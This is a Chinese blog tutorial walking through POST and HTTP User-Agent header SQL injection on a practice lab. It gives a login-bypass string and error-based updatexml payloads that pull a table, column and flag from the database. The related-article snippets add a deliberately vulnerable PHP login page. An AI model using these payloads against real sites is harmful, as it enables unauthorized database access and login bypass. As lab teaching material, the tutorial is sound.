POST注入/HEAD注入

最新推荐文章于 2022-04-09 15:31:08 发布
最新推荐文章于 2022-04-09 15:31:08 发布
阅读量252 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49959448/article/details/116466108
版权

POST注入/HEAD注入

POST注入

跟GET注入的本质区别

只是传参方式的不同,本质上没有什么区别

POST注入高危点:
登录框
查询框
等各种和数据库有交互的框

POST注入最经典的万能密码:
'or 1=1 --qwe
在这里插入图片描述在这里插入图片描述
这样就可以直接登录成功

表单不一定是POST传参

Head注入

首先什么是Head注入?
我们先从靶场随便抓一个包
在这里插入图片描述
最下面一行五颜六色的就是POST注入的参数

而上面那一大块就是Head注入的参数

Head注入分为两类:
1.盲注
2.报错注入

这里我们先以报错注入为例

我们以靶场为例
我们先看一下这个靶场的源码来便于理解
这里我们运用$uagent这个超全局变量来测试
在这里插入图片描述通过源码我们知道,这里ua的注入点是HTTP_USER_AGENT这个参数

这里我们需要输入正确的账户名和密码,因为Head注入是在成功登录的情况下进行的

在这里插入图片描述我们通过burp抓包,找到User-Agent这个参数
在这里插入图片描述
再通过源码我们知道闭合方式是’ ,1) --qwe

这里我们会用到一个新语句updatexml(目标xml内容,xml文档路径,更行的内容)
这个是用来对文档路径进行报错的

于是我们输入语句’ or updatexml(1,concat(’!’,(select table_name from information_schema.tables where table_schema = database() limit 0,1)),1),1) – qwe
在这里插入图片描述
得到目标表名flag_head

再用语句’ or updatexml(1,concat(’!’,(select column_name from information_schema.columns where table_schema = database() and table_name = ‘flag_head’ limit 1,1)),1),1) – qwe
在这里插入图片描述

得到目标列名flag_h1

最后用语句’ or updatexml(1,concat(’!’,(select flag_h1 from flag_head limit 0,1)),1),1) – qwe

在这里插入图片描述得到flag

Wuyan_233
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入知识总结
hackzkaq的博客
01-20 1万+
更多黑客技能 公众号:暗网黑客 作者:掌控安全-veek SQL注入基础 SQL注入(英语:SQL injection),是发生于应用程序与数据库层的安全漏洞。 简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了字符检查,那么这些注入进去的恶意指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。 OWASP Top10虽然常年有更改,但sql注入基本一直位于榜首,其优势在于极低的使用代价以及极高的危害性,地位可见一斑。 SQL注入的危害自然是很大的,通常有以.
POST注入HEAD注入
weixin_53026460的博客
09-27 1296
(一)POST注入和普通的注入(联合查询)是没有区别的,它只是根据传参方式不同来判断类型。(二)POST注入的核心在于框,有框就可以尝试下是否存在注入;(三)GET可以直接传递参数,POST更多是存在于框,因为框代表着交互点,像登录框、查询框等各种一般都是通过POST进行传参的,当然这句话也不是必然,我们举一个baidu的例子;像这样在URL栏可以看到的是GET传参;各种框,一般来说都是POST传参,但不绝对,比如上面的baidu首页的例子就不是POST传参;
[转] 四种常见的 POST 提交数据方式
weixin_34363171的博客
07-12 812
PS: request里面最重要的是Content-type :如果是application/json,那么request里面就把一个字符串化后的json 数据放在body里,这样服务器可以把它恢复成正确的数据结构,比如说{["ab","bc"]},到服务器端恢复出来就是String XX[],String数组。 Reuqest如果是直接发binary stream过来,服务器这端就用byte[]...
UA头注入Cookie注入Referer注入
十五年游戏主程转渗透之路
04-09 5075
UA头注入,Cookie注入,Referer注入
SQL注入——从学会注入到不知道能不能注进去
净邪的博客
05-17 1967
注入总览 判断注入点——猜解字段总数——判断显示位——查询数据库库名——查询表名——查询字段名——查询字段内容 SQL 注入分类简介 数字型注入 假设存在一条 URL 为: HTTP://www.aaa.com/test.php?id=1 1.可以对后台的 SQL 语句猜测为: SELECT * FROM table WHERE id=1 2.先在输入框中输入一个单引号 ' 这样的 SQL 语句就会变为: SELECT * FROM table WHERE id=1' 3.在输入框中输入
POST注入
monkey:的博客
10-25 1714
POST注入 一、POST注入介绍 注入攻击的本质是把用户输入的数据当做代码执行,POST注入一般会在表单的地方。 1.有两个关键条件: ①用户能够控制输入 ②原本程序要执行的代码拼接了用户输入的数据 2.POST注入高位点: 登录框 查询框 各种和数据库有交互的框 3.最经典的POST注入莫过于万能密码: ’or 1=1 # 万能密码就是引出注入手法,你在登录的时候输入什么都能登录 二、例题 例如第一题 首先我们查看源码 $sql = 'select *from user where username
深入分析SQL注入攻击及安全防范
10-31
<FORM action='process_login.asp' method=post> 账号: <TD><INPUT type=text name=username> 密码: <TD><INPUT type=password name=password> 登录> </TABLE> </FORM> </CENTER> </BODY> </HTML> ``` 在这个...
php AJAX POST的使用实例代码
12-02
在本文中,我们将深入探讨如何使用PHP和AJAX进行POST请求。AJAX(Asynchronous JavaScript and XML)允许我们在不刷新整个网页的情况下与...请注意,实际应用中应考虑错误处理和安全性问题,例如防止SQL注入和XSS攻击。
PHP利用超级全局变量$_POST来接收表单数据的实例
12-18
在本文中,我们将详细探讨如何使用`$_POST`来接收和处理表单数据。 首先,让我们分析提供的代码实例: ```html <!doctype html> <head> 利用超级全局变量$_POST接收表单</title> ...
xUtils3:Android orm,位图,http,视图注入
02-15
请求协议支持11种谓词:GET,POST,PUT,PATCH,HEAD,MOVE,COPY,DELETE,OPTIONS,TRACE,CONNECT 支持超大文件(超过2G)上传 支持断点下载(如果服务端支持Range参数,客户端自动处理断点下载) 支持cookie...
html5 postMessage前端跨域并前端监听的方法示例
12-13
同时,为了确保安全性,我们在使用 `postMessage` 时应检查 `event.origin` 以防止恶意数据注入,而在使用 `onstorage` 时要注意避免不必要的性能开销。理解并熟练运用这些技术,将有助于提升你的前端开发能力。
SQL注入Post型提交方式的注入--免密登录
weixin_44029504的博客
04-29 1499
Post型提交方式的注入 POST提交,由于不在url中携带,所以借助工具burpsuit!!! SQL注入之万能密码 1)sql注入之万能用户名 注释法 //将密码注释掉 eg:用户名处 admin' # or 方法 eg:admin' or '1'='1 2)updata 3)insert—UA 以Less11为实例:实现免密登陆 方法一:使用注释法 1、在页面使用用户名和密码登陆(...
注入全方位利用-POST注入HEAD注入
weixin_30379911的博客
08-04 685
注入全方位利用-POST注入HEAD注入 一、POST注入介绍 注入攻击的本质,是把用户输入的数据当做代码执行。 这里有两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据 POST注入属于注入的一种,相信大家都知道POST\GET两种传参方式。 POST注入就是使用POST进行传参的注入,本质上和GET类型的没什么区别 ...
HEAD注入靶场作业
weixin_45540609的博客
04-17 367
HEAD注入1——使用mode header报错 1、暴力破解密码 由于head注入需要知道登录名和密码,于是我们用burp暴力破解出用户名和密码 先在登录框中随便输入用户名和密码,用burp抓包,把抓包的内容发送给intruder 在intruder-position选项卡中的Attack type选项,选择Cluster bomb,把username后内容和password后内容Add& Payload设置第一个add&和第二个add&,可以猜用户名和使用字..
Sqli-labs Less18-22 HTTP 头注入 POST
kevinhanser
08-09 935
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 18: POSt - Header injection- Uagent field - Error vased 测试漏洞 源代码 $uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']); ...
head头部注入、宽字节注入
qq_43238111的博客
05-24 471
head头部注入 原理 在传递参数时,利用请求头部参数传递参数,变成构造sql语句,然后发送执行sql语句 超全局变量是: $_REQUEST (获取GET/POST/COOKIE) COOKIE在新版本已经无法获取了 $_POST (获取POST传参) $_GET (获取GET的传参) $_COOKIE (获取COOKIE的值) $_SERVER (包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组) $_SERVER功能强大。
SQL注入POST型常规注入
热门推荐
Jim的博客
08-14 1万+
less11单引号字符型注入 注入:test' or 1=1 #&password=test sql语句:select username, password from users where username='test' or 1=1 #' and password='test' limit 0,1; 注入:uname=test&passwd=test' or '1'='1 sql语句:
mpu6050陀螺仪使用方法开发教程文档.docx
最新发布
07-30
mpu6050陀螺仪使用方法
<html> <head> <title>Secure web Login II</title> </head> <body> <?php if ($_POST['user'] && $_POST['pass']) { mysql_connect(MYSQL_HOST, MYSQL_PORT, MYSQL_USERNAME, MYSQL_PASSWORD); mysql_select_db(MYSQL_DB); $user = $_POST['user']; $pass = md5($_POST['pass']); $query = mysql_fetch_array(mysql_query("SELECT pw FROM ctf WHERE user='$user'")); if (($query['pw']) && (!strcasecmp($pass, $query['pw']))) { echo "<p>Logged in! Key: FLAG(XXXXXXXxxxxxxxxx]</p>"; } else { echo "<p>Login failure!</p>"; } } ?> <form method="post" action="index.php"> <input type="text" name="user" value="Username"> <input type="password" name="pass" value="Password"> <input type="submit"> </form> </body> </html>
06-02
这段代码存在SQL注入漏洞。攻击者可以使用单引号绕过用户名和密码的输入限制,从而注入恶意的SQL代码。例如,如果攻击者将用户名设置为`' OR 1=1 --`,则查询将返回第一个用户的密码,并且登录将成功,因为`1=1`始终...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值